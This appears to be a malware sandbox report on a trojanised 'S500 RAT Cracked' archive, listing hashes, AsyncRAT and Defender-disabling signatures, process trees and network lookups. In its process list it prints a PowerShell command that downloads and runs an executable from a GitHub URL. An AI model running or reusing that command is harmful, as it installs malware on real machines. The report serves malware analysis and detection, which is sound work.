SHA256 ba959832e1815982aac245a02dc7189131ae297d3e71f0b79b401e4b9f83d07c
SHA512 ffadd2c1de91f97dedcfb2da2cfba396352f84b47d31c735ef923f159452bc07a18bc49a22bf182b1d5f4849d4799a49a3ba2aa1325836f65a6b759150cc1b16

C:\Users\Admin\Desktop\S500 RAT Source Code\Handlers\HandleAudio.cs

MD5 e46826f22037990cdcbf2adf56a63ae1
SHA1 806530956a20e6bb5cdb8321b2e8e9d762ffe158
SHA256 c14254a319d4575c45f2a3331f030629aafa990c8b1a6b28ece3cd326ac7b68f
SHA512 33df5e3cf704669ab97e78327ce4db6c6929e40e4f4b586a2f876e9d6c554a46751f7997561c518b0b53ec2361e1bcecfaef5389e71a28e31237a30fb37aeec3

C:\Users\Admin\Desktop\S500 RAT Source Code\Forms\FrmTransfer.cs

MD5 9250ace37a98aa75bbf0e7df7eadc6b4
SHA1 a9777df578a77416b04e95d36307e6e05b40e5ae
SHA256 a4b88b97dbd6d32dbbb925ed4bbbac815e720a339f183cbeb812a3cb85a229c7
SHA512 4ea1cc0d93a068ef6acd18cb43fcee156e44cede08eb89e23da1fbd18af55c81ccb1a1431d6b241aac85954f20e39a55710b8ee776e2f2d343327a791b1c83de

C:\Users\Admin\Desktop\S500 RAT Source Code\Handlers\HandleFun.cs

MD5 ecfa94e4d1626b2d7b5fab42ba6eecff
SHA1 b55b9d388c14dd5b7ccd51a1a6a5d969bdfee90f
SHA256 735f6018d61e7f65cf81b828e751bed543ffa76b187b57f3fdf8eb5e5d22d026
SHA512 1870531cdf538cc6e4fbbe604cabdf00e8483f70b4e8da80717fb546eccb40415f735e85d7fd50ad658d80e247fa33b174072d2182bad983491ffa874f275606

C:\Users\Admin\Desktop\S500 RAT Source Code\Handlers\HandleHVNC.cs

MD5 4a1d06f0d9fac5fb70a0322773a51f77
SHA1 50e696781672593f8a3ab3149bc7b086a2cee31e
SHA256 9f2b07af21c52b1880a540294b12bfcf3a60744b0f139f8bfd6c7afbb2d0621c
SHA512 689ba12a4fd4c0cae9e85b31a2f0eeeadfe9f756f932f289e3fc4020b54525b165dcbc9fe11dab681c36612f60b93756bd3edf69fb174c8910f324f65f591512

C:\Users\Admin\Desktop\S500 RAT Source Code\Handlers\HandleKeylogger.cs

MD5 66867585b21dad280d820d04def0edb6
SHA1 cb77bd7066df43851fa0c633b24a53ef3c079d87
SHA256 802cf017ce9b4c065dd3cd9ba8e279127b4ba935bac1037541702e3c73dbf2b7
SHA512 e4c7d900738cea14ea01e31da594ff0e8bcf8487bf4387cfb8f78b00aff9aaeda51177cf060bcf259375810e097553a486192b618012e1272b3178206bcb98c8

C:\Users\Admin\Desktop\S500 RAT Source Code\Handlers\HandleInformation.cs

MD5 993b8d7378d2249fbb6ce0d1fbd0caf2
SHA1 48eba498f0b64cc1d9235389d68c671a818b2a27
SHA256 460dbf36998b8d267b2b4f748428c3a06a027ce788cb28d73b64f82ece7e6a03
SHA512 aa94aa46b70cde920642e4e3294a3cb99825dd96c06855d76811ca81f805907a92abdcc89e5e1aa35fe4c8c598c63d7c8611a14894b7d6997ad60c53a5bcb8e5

C:\Users\Admin\Desktop\S500 RAT Source Code\Handlers\HandleProcessManager.cs

MD5 6d2985668bda0e793da1c636775808ee
SHA1 f54bf51f11a3b453592837d2e72790e2d0a285a6
SHA256 cde2ba5e1be41a86eaf359ff6d585677d722f1a7e92d962458f242f2f4517f75
SHA512 7950c3c2e959ed91cd1cf5384eb78d7ef709a900a39e74be9482d17ed87f21f922f00d456999f2d344354f4932a9a34e96b3c08a0537b9e3265d0f2c1ab91843

C:\Users\Admin\Desktop\S500 RAT Source Code\Handlers\HandlerFileSearcher.cs

MD5 ebb5485590b79bdbf8ae79a63f83e6da
SHA1 021d5f7d2fe64073446efca70c9da3b47c37c59c
SHA256 edb4185f0bdca89cbf2cebc72135e93a11913d99a3d167fef0bd84da57c3bd8c
SHA512 703729773fd015164d3792a0b726c3f227647dbe589c6105d0907de88d71ad93b4aad96c7b2d53716c9cf440b639fa0c51f1a91c3b88771edf658e05bc52c0a1

C:\Users\Admin\Desktop\S500 RAT Source Code\Handlers\HandleShell.cs

MD5 02dfab19fe896b474e111c5438e1698c
SHA1 4fa009ab41770c7d5b2305a4a07e07167b375f0d
SHA256 c8de8a4f8c8a5df94bc6a485a7440bc21966957f60fb301918af02408b5488cd
SHA512 e92583725f85805471b3b55b6a9f6fa8bd31249780b9bd951ffe9b59cc5d2e35f362dac750db41181ab41f01c1b32a6666e9185fc5cf57001c129a2c7987644d

C:\Users\Admin\Desktop\S500 RAT Source Code\Handlers\HandleReportWindow.cs

MD5 9764d1ac50cdb0b7212614208967d63f
SHA1 7f9ca9707db0d016ee3f285b4e2f7ee05228a8a0
SHA256 2bb340f96986529f5c23cdbc51bfe04ded6a81f33c6c6e6d8df0b480b117898e
SHA512 abf6e26e0fabe614084f386afeccf2e1c73d6c7ca7702471a45592730f88028dd223cb4981b7ae5e6d91125999a258b421d8ef35549354f5ddc96bb510cfa127

C:\Users\Admin\Desktop\S500 RAT Source Code\Handlers\HandleThumbnails.cs

MD5 04c8276b921996b82ea3e4dcb46a6903
SHA1 fb3852b13f015051838aa5442e6b7ef412dc0bf0
SHA256 f804baaac0fa4c7706b83f70a877f8b8998bac11ca1cf35f01ed62d3bcb3751c
SHA512 8317e7b79d90762607af931af202c7dd70223adb723c03573f4ea67c06236ed4f148d7b1a07e8ad1df5cb5bf7dba4f8a3bb1d7104032f652b5b7ab65b88c7ab0

C:\Users\Admin\Desktop\S500 RAT Source Code\Handlers\HandleRemoteDesktop.cs

MD5 8dee4aae3ab14cb9c2edcd638c74bbd8
SHA1 11eb87079623c7f98513487dff071be2c4c13cd0
SHA256 01b1270f336c44160a2137d0c8bac252abb21d69280592a964202a6853a87813
SHA512 78080cbb205695493c94c42c06bb875827420fee3a8f1d1090082fa293ec1d4fa9ce85cd82bdd401c6d54229f37ec615804c2ac5f52eea1668d8fd412931eb90

C:\Users\Admin\Desktop\S500 RAT Source Code\Handlers\HandleRecovery.cs

MD5 e93d4932ba858f6a61f67c9a62bd72e3
SHA1 a84a131f2fca55c987a6f10a8530431902227391
SHA256 db63133ff98e2a34a82bbe6a6cb797f83379be1b0cb8546b8332ba8accd32e08
SHA512 a3635926cb344f6bfbfc1837acd252f362c4a3712cae556b5f5248a64f7d706e6ace0de71baa425f801f42ec4959c41a5ebfacb697bbc2b4e4308b28c2a3d23c

C:\Users\Admin\Desktop\S500 RAT Source Code\Handlers\HandlePassword.cs

MD5 25d0a72cfb2520e7e92347c8016d1fed
SHA1 c50a25e97f9e4ffa1f3a357866b751c2ec1aa0a5
SHA256 2f60396bd4fd1235f701600dde55c355114fe4d6ad3b59a9a26615feb9b824f8
SHA512 630f804e83c3b8a9b826790e5327344e1a5881abf5a31440f87aaa3a95616e5ada3ee4ef6997cb80881b57e2e8450bdea236871d0a1ad31d28bc7f8d36028900

C:\Users\Admin\Desktop\S500 RAT Source Code\Handlers\HandleNetstat.cs

MD5 8f8786d6be266aab63c51a361cb1890c
SHA1 b8630833c93c17fc6a6f62e1bced0da122ed1fbd
SHA256 3c4b983c453466ddca8f3a6a909680b5c4b4505b1a6e40e9c1b7fd2e82a62101
SHA512 d40b4bb708765065ab0a35a86e13574723e473f020804e30eea90cc00fd5676ff0c797d3aff61d94f2b158c660dbba0346590ab01d3c6173d4518b489083cbe7

C:\Users\Admin\Desktop\S500 RAT Source Code\Handlers\HandleMiner.cs

MD5 060dc8b25c808fef52c6aae610d22bc8
SHA1 484ebd1f52152840b4f0945838b90ade3984d3f2
SHA256 5d45c4ea68475e71fb1ac0c0c160d25aa887cbf355eac265ce36f742881aafa5
SHA512 06d25becfcce01b37aef3dcd4a9000f08a62bef2b65ab9aa6636196933caadd818521ed30417ed9d2f092abbeae073d5acd129837e70e78817c7b1fc0a26734f

C:\Users\Admin\Desktop\S500 RAT Source Code\Handlers\HandleLogs.cs

MD5 d85ffc7dc4a70e49867cb4506c892eb0
SHA1 ee660a91ef1c697952145740181e88e51c51f564
SHA256 df6baead08beeeae2101989ca93dd0dfb1eec6d5b1ea76386e44f275faa75a59
SHA512 e1b7fcfd74eeb4259fa1f449b93debe74ce38c8970bdcfc5ccb0de82e3d532b11e861bb59482d6872f9dfbcf427b8d16e441d23e3e13301e8f3d9790434e80a5

C:\Users\Admin\Desktop\S500 RAT Source Code\Helpers\Compiler.cs

MD5 9a053c7a21cf1dee3cecc32e7ee9b551
SHA1 c42383a966016cd83f58837a811425a16dd01df3
SHA256 9e916b8c881168e511aaaea904660879b8b77c20a0552ff9208edd22c1a86253
SHA512 cc558e54ca3cf08371aef075afde570c8cd0b9dd1af24e5dfc0a28af33a9c0d90f440a24f803bcce337fc2e444a3f92221293a7abdca1b6306fe7eaaf3a53900

C:\Users\Admin\Desktop\S500 RAT Source Code\Helpers\ListViewColumnSorter.cs

MD5 bae01e7821ec5afd7ff51fbe94baf083
SHA1 72d7846e5ef290231a45b6b51ef61fb27ce4fcf2
SHA256 8e5186d60147f8a722fcf28b7e1b91b00d082d32401c189eae2c93343bc2e554
SHA512 bca3bd26f5bf05bdbe6e4714e10bff31af8be89f7240e7835d2c3c4f4381134ad13f17aa0eb7c20f1cc47c48c9de47ae47f36d7ba1010a7bd1406ed9ae27b86c

C:\Users\Admin\Desktop\S500 RAT Source Code\Helpers\FileInfo.cs

MD5 2f9d9b634b11fb6f2c5b6b1842d1006f
SHA1 d3d66d515ffe1c18fa4af2017df62712f5ffc03b
SHA256 9ad63e3ba242bd5aa970c8255227a7eac600d6f46110b64f51685c98b138010a
SHA512 3f6598f5b9b335f61785d5e18f484c223a516a36167d161f94068fcc4df03b7ae56f20c5e8a543f940ed97019564a84426197836ec15a20910262c5f8c6b6de5

C:\Users\Admin\AppData\Local\d4578ee47ee76e337547c667d2e9866d\Admin@IZKCKOTP_en-US\Grabber\DRIVE-C\Users\Admin\Desktop\S500 RAT Source Code\Resources\tomem.png

MD5 4aa22d0e14ae3ab96820b5fe3b29c24b
SHA1 92474fa98104670a4d73753b0ce0c3243b0fc751
SHA256 09dad12ed97724088278d93d71e703a617ea062f5dfecd464f91130bc056b5ec
SHA512 90c8295d577eb573b23f6b809f18f2a22fb8bb6a49ad2c2c2c4ad87a3ce922ee263f5a0bc000b119fe61b4cb49e86bdb8ea01a94ed9647329cc14fadc5c86d7c

C:\Users\Admin\AppData\Local\d4578ee47ee76e337547c667d2e9866d\Admin@IZKCKOTP_en-US\Browsers\Firefox\Bookmarks.txt

MD5 2e9d094dda5cdc3ce6519f75943a4ff4
SHA1 5d989b4ac8b699781681fe75ed9ef98191a5096c
SHA256 c84c98bbf5e0ef9c8d0708b5d60c5bb656b7d6be5135d7f7a8d25557e08cf142
SHA512 d1f7eed00959e902bdb2125b91721460d3ff99f3bdfc1f2a343d4f58e8d4e5e5a06c0c6cdc0379211c94510f7c00d7a8b34fa7d0ca0c3d54cbbe878f1e9812b7

memory/2028-1517-0x000000001C350000-0x000000001C3D0000-memory.dmp

memory/2028-1518-0x000000001C350000-0x000000001C3D0000-memory.dmp

memory/2028-1506-0x000000001C350000-0x000000001C3D0000-memory.dmp

memory/1360-1569-0x0000000002020000-0x0000000002060000-memory.dmp

memory/2192-1573-0x000000001BD90000-0x000000001BE10000-memory.dmp

memory/2028-1574-0x000000001C350000-0x000000001C3D0000-memory.dmp

memory/2192-1575-0x000000001BD90000-0x000000001BE10000-memory.dmp

memory/2028-1576-0x000000001C350000-0x000000001C3D0000-memory.dmp

memory/1360-1577-0x0000000002020000-0x0000000002060000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Cab3AD8.tmp

MD5 ac05d27423a85adc1622c714f2cb6184
SHA1 b0fe2b1abddb97837ea0195be70ab2ff14d43198
SHA256 c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d
SHA512 6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

MD5 753df6889fd7410a2e9fe333da83a429
SHA1 3c425f16e8267186061dd48ac1c77c122962456e
SHA256 b42dc237e44cbc9a43400e7d3f9cbd406dbdefd62bfe87328f8663897d69df78
SHA512 9d56f79410ad0cf852c74c3ef9454e7ae86e80bdd6ff67773994b48ccac71142bcf5c90635da6a056e1406e81e64674db9584928e867c55b77b59e2851cf6444

C:\Users\Admin\AppData\Local\Temp\Tar3DAC.tmp

MD5 dd73cead4b93366cf3465c8cd32e2796
SHA1 74546226dfe9ceb8184651e920d1dbfb432b314e
SHA256 a6752b7851b591550e4625b832a393aabcc428de18d83e8593cd540f7d7cae22
SHA512 ce1bdd595065c94fa528badf4a6a8777893807d6789267612755df818ba6ffe55e4df429710aea29526ee4aa8ef20e25f2f05341da53992157d21ae032c0fb63

C:\Users\Admin\AppData\Local\d4578ee47ee76e337547c667d2e9866d\msgid.dat

MD5 cfcd208495d565ef66e7dff9f98764da
SHA1 b6589fc6ab0dc82cf12099d1c2d40ab994e8410c
SHA256 5feceb66ffc86f38d952786c6d696c79c2dbc239dd4e91b46729d73a27fb57e9
SHA512 31bca02094eb78126a517b206a88c73cfa9ec6f704c7030d18212cace820f025f00bf0ea68dbf3f3a5436ca63b53bf7bf80ad8d5de7d8359d0b7fed9dbc3ab99

memory/2192-1676-0x000007FEF5940000-0x000007FEF632C000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted: 2024-03-20 17:22

Reported: 2024-03-20 17:47

Platform: win10-20240221-en

Max time kernel: 1310s

Max time network: 1217s

Command Line

cmd /c "C:\Users\Admin\AppData\Local\Temp\S500 RAT Cracked + Source .rar"

Signatures

AsyncRat

rat asyncrat

Contains code to disable Windows Defender

Description Indicator Process Target
N/A N/A N/A N/A

Async RAT payload

rat
Description Indicator Process Target
N/A N/A N/A N/A

Obfuscated with Agile.Net obfuscator

agilenet
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Enumerates physical storage devices

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3281913400-1494313570-2321515684-1000\Software\Microsoft\Internet Explorer\TypedURLs C:\Users\Admin\Desktop\S500 RAT Cracked\ServerRegistrationManager.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3281913400-1494313570-2321515684-1000_Classes\Local Settings C:\Windows\system32\cmd.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3281913400-1494313570-2321515684-1000_Classes\Local Settings C:\Program Files\7-Zip\7zFM.exe N/A

Opens file in notepad (likely ransom note)

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\NOTEPAD.EXE N/A
N/A N/A C:\Windows\system32\NOTEPAD.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\Desktop\S500 RAT Cracked\ServerRegistrationManager.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files\7-Zip\7zFM.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Program Files\7-Zip\7zFM.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeRestorePrivilege N/A C:\Program Files\7-Zip\7zFM.exe N/A
Token: 35 N/A C:\Program Files\7-Zip\7zFM.exe N/A
Token: SeSecurityPrivilege N/A C:\Program Files\7-Zip\7zFM.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2332 wrote to memory of 312 N/A C:\Windows\system32\cmd.exe C:\Program Files\7-Zip\7zFM.exe
PID 1800 wrote to memory of 3936 N/A C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT.exe C:\Windows\System32\cmd.exe
PID 3936 wrote to memory of 2080 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\chcp.com
PID 3936 wrote to memory of 1512 N/A C:\Windows\System32\cmd.exe C:\Users\Admin\Desktop\S500 RAT Cracked\ServerRegistrationManager.exe
PID 3936 wrote to memory of 3136 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3936 wrote to memory of 4908 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\taskhostw.exe
PID 224 wrote to memory of 4148 N/A C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT.exe C:\Windows\System32\cmd.exe
PID 4148 wrote to memory of 4600 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\chcp.com
PID 4148 wrote to memory of 1224 N/A C:\Windows\System32\cmd.exe C:\Users\Admin\Desktop\S500 RAT Cracked\ServerRegistrationManager.exe
PID 312 wrote to memory of 832 N/A C:\Program Files\7-Zip\7zFM.exe C:\Windows\system32\NOTEPAD.EXE

Processes

C:\Windows\system32\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\S500 RAT Cracked + Source .rar"

C:\Program Files\7-Zip\7zFM.exe

"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\S500 RAT Cracked + Source .rar"

C:\Windows\System32\rundll32.exe

C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

C:\Windows\system32\NOTEPAD.EXE

"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\S500 RAT Cracked\Readme.txt

C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT.exe

"C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\CCA6.tmp\CCA7.tmp\CCA8.bat "C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT.exe""

C:\Windows\system32\chcp.com

chcp 65001

C:\Users\Admin\Desktop\S500 RAT Cracked\ServerRegistrationManager.exe

ServerRegistrationManager.exe

C:\Windows\system32\wbem\WmiApSrv.exe

C:\Windows\system32\wbem\WmiApSrv.exe

C:\Windows\system32\NOTEPAD.EXE

"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\Resources\stub.txt

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Powershell -Command "Invoke-WebRequest 'https://github.com/CVE-TEAMDSNH-20230611/20230611VNM/raw/main/taskhostw.exe' -OutFile taskhostw.exe"

C:\Windows\system32\taskhostw.exe

taskhostw.exe

C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT.exe

"C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\D2CD.tmp\D2CE.tmp\D2CF.bat "C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT.exe""

C:\Windows\system32\chcp.com

chcp 65001

C:\Users\Admin\Desktop\S500 RAT Cracked\ServerRegistrationManager.exe

ServerRegistrationManager.exe

C:\Windows\system32\wbem\WmiApSrv.exe

C:\Windows\system32\wbem\WmiApSrv.exe

C:\Windows\system32\NOTEPAD.EXE

"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\7zO831A2C0C\Stub.txt

C:\Users\Admin\Desktop\Stub.exe

"C:\Users\Admin\Desktop\Stub.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 29.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 7.173.189.20.in-addr.arpa udp
US 8.8.8.8:53 0.205.248.87.in-addr.arpa udp
US 8.8.8.8:53 45.179.17.96.in-addr.arpa udp
US 8.8.8.8:53 github.com udp
DE 140.82.121.4:443 github.com tcp
US 8.8.8.8:53 github.githubassets.com udp
US 185.199.108.154:443 github.githubassets.com tcp
US 8.8.8.8:53 4.121.82.140.in-addr.arpa udp
US 8.8.8.8:53 154.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 129.134.221.88.in-addr.arpa udp

Files

C:\Users\Admin\Desktop\S500 RAT Cracked\Readme.txt

MD5 531208ea558a68c95339bea9517845c3
SHA1 95865bbeb196cf007626c92cdef1524c9b16dc5a
SHA256 dbceb36fa695bfe2bd706b22cb690976a3df77a46ec97d9188a3875308044b3a
SHA512 46f04b05cd14d80bef69325802464d190856af9f2844312f84263baf00eb14d3ca58d647fed8fcc5de0106883ec3f2546fed8b58ca09464fd6a336e7dece66f3

C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT.exe

MD5 5b52658c4517684971de10a6b7a67c30
SHA1 f0820c52617ebacaf53d8b8d97f1a42c712888bd
SHA256 3ec85206a8c5d584c2cf4ab575bdd5cf4b29ed3a896032a1adc37f1c08507b31
SHA512 ce96d25cfbb0d2c4addf242aa05c05909d7a883a70881df8336498b16913ec21bd64c07519eba89b2da90a05902fd7618e172a7602b985153eac09d9f226c8d6

C:\Users\Admin\AppData\Local\Temp\CCA6.tmp\CCA7.tmp\CCA8.bat

MD5 fc4af7384f0b6f274dd3e745f0aceeaa
SHA1 31b310f869b15b84e52ef282cabaee974e5043cf
SHA256 f27a781bd4e8788990ceecac17ba4b9642e15f0d311e17d62c70db694c207a34
SHA512 dc7b542d89236105c8b8976e5af0e9e557eaa919adb2e8384b55b70c0b5bc6f00d2010538b9abaca90bb797d24fd509acdc1b3a6beea27f11405bf198349f57f

C:\Users\Admin\Desktop\S500 RAT Cracked\ServerRegistrationManager.exe

MD5 aa2fc72b58059e5e7e9e7003ab466322
SHA1 e171576589134431baccb40d308e7dcbc776e087
SHA256 f107c0f275bd1c773e1ff2d78b60a4060b8353b02f45d3892968206fedffdf88
SHA512 26d69ad0d3f41bf08585307595e1d670c7d7905e1f86a566a36d9b0c836d3b349a6349e1f2885d433d35bd111f95ce004ae34e81443f96b73e784db3594e3eef

C:\Users\Admin\Desktop\S500 RAT Cracked\Guna.UI2.dll

MD5 0f07705bd42d86d77dab085c42775244
SHA1 7e4b5c367183f4753a8d610e353c458c3def3888
SHA256 cf9b66e11506fa431849350c0cb58430a71e5ec943d2db9ef1b2e2302f299443
SHA512 851b1a4c470ee7fe07ce5619c16fd391428585926c5b559694a9e445633ea51ec86c74a3bbf3bce39d943c4bf714dad2fd3c4a4d0703be2333541c79a2ee97f0

C:\Users\Admin\AppData\Local\Temp\c6ef4c2b-9a55-40b4-957b-c3cb74191397\GunaDotNetRT64.dll

MD5 9c43f77cb7cff27cb47ed67babe3eda5
SHA1 b0400cf68249369d21de86bd26bb84ccffd47c43
SHA256 f25b9288fe370dcfcb4823fb4e44ab88c7f5fce6e137d0dba389a3dba07d621e
SHA512 cde6fb6cf8db6f9746e69e6c10214e60b3646700d70b49668a2a792e309714dd2d4c5a5241977a833a95fcde8318abcc89eb9968a5039a0b75726bbfa27125a7

C:\Users\Admin\Desktop\S500 RAT Cracked\SunnyUI.dll

MD5 af527b22b92a23c38a492c5961cf2643
SHA1 15106adfa13415287b3e9d8deba21df53cb92eda
SHA256 4208c9293c5684d2fc3c8f5a269a1120adee32fbd2766bbb73410aab2d491b7a
SHA512 543cce9b5e4c9558bf0bd0da9d6af8c1ad2f7d62e2d65a9aa4e3af9e4840ce6fb6bbe8952bd20f6f1e3a6d3b5e5e5b3417a60b6d955bfa4e23a653262677b49c

C:\Users\Admin\Desktop\S500 RAT Cracked\initialization.dll

MD5 3aaae3cec15b86693ae9fb8e1507c872
SHA1 ed8d0a139c609eb886482718ec2ecf96cbbe8c84
SHA256 a027b6b344e5a637bc8377fe58166273d2b76e92ff8c66bd505d46c21fe3b21b
SHA512 407558e01ade1832bb021b5af0209e7a6bef98ab35b9f4723a1add48362bd13f566697a8fb41af48c0bb15ca13585f9c09ac8d5da0feb322798c778b09cf4463

C:\Users\Admin\Desktop\S500 RAT Cracked\Certificate\ServerCertificate.p12

MD5 c60e527a85f285ddc66c2fcf160b1be7
SHA1 abcf2b6bffea9f0f30190783f6eae2434ef7a9a8
SHA256 35c46a9e9dc60a74a25572e743794a31fecd08672813d349a39f2d13b01e789f
SHA512 77a661544c2d7f2d8b870cdd503b806aea6de3a2b5aee19327c05aeef137a1df3661d249219fe73e7a300189c732efeb5d2004226c6e429fa024f1d3b1dec84e

C:\Users\Admin\Desktop\S500 RAT Cracked\SunnyUI.Common.dll

MD5 17cbdd9e4cb0ede2fad8c08c05fdaa84
SHA1 74bc0ea3e8bd64c6752b6c0adac1bfe2b313416c
SHA256 d975bc4711655e6fd2361ae9b056c617051f616ced5b46ce7772255a85712441
SHA512 1948c20585ecb9984cd9452a74bcb75e81c35ca37f0cf0e1d3f211ad71b9e40c215f4784af7803cec9baef9984f682a32817a85806aefad21830b13b6a0a6a4a

C:\Users\Admin\Desktop\Resources\stub.txt

MD5 3fc302b81fdf520e4d3a170fe3ed0f0d
SHA1 9d821cc04064add1192decb54c76fdc9c4ef5747
SHA256 da3ab74adcfac4c84c23b564d7923beb706f62eb279cc6d945ac163721457f32
SHA512 b71077bb6703454c437cfdba4be2e9b86dfc9e3bb63ac89eeb9be0746c4f0b6b9d4bd16f7d44da9df89ab543420320dcd521115ea776c77fe32825836a86a552

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_1k21x3pv.pbi.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT.exe

MD5 3c2de6bc2aad943c8ccfd2ae1d2db50d
SHA1 3c909af7b1e92472fec95641cfb0baa65d434886
SHA256 27c469c1ab1ecb80bc4fd2d60966174cd973456d584e0aa836811e726550d53d
SHA512 37a0c33b12cdaf1657f8080e2fe94ba7dc648e514f5ac779c3bb0a7938dfadfb6ee26db0204e10a194645da00883a7a4db2d04bd0850494ba2d12516c344000e

C:\Users\Admin\Desktop\S500 RAT Cracked\ServerRegistrationManager.exe

MD5 295a148a835de7e9dcfd7b852631289a
SHA1 91981906fdf1f36c6f0a2a1243457409588379ae
SHA256 963bcb01e62f49a6a26320fd1d4c7ba1cc8883de6fb5478bdc1509b3da699e86
SHA512 49363841c754d6ddee2c21668a389663065177c3bb97c827925e56c5957e60428bd33f82ce2666587f55cb5fdc15cb9e92708d4d8e2472706253a80e42239a5f

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\ServerRegistrationManager.exe.log

MD5 fa931350508a2b855cce92719c4c207c
SHA1 3b6eb7b920d1c70b9f61b3745523b20828ecf21b
SHA256 1b6609def0e3a0533c446233db9438cdc1901a22acae76affbc4866e25595b0f
SHA512 b85d45035b1e62df0c1032c796796f6e30dd03a992744d9a67e0b812b8e4e690b4acc19921931bdac5f0e0cb4d5ef54f2161da3aadc922fee27a3f49fad6a856

C:\Users\Admin\AppData\Local\Temp\7zO831A2C0C\Stub.txt

MD5 fd7b1162b84b0add4146e3bc0d13b7dd
SHA1 1fb46807f499267832aa444e12c403df880855bb
SHA256 972c912943000017fe92e563d4b7a5147f15825718edcb17307af79f85ac5f10
SHA512 6f5ff1aff1c899f9ae48cd177fd1bb277b2b9a7395858de1077392c293a4c68307d55d84a7c9968342da5a1296e720b00d8cd6f42b5faa11b7c643260eac300d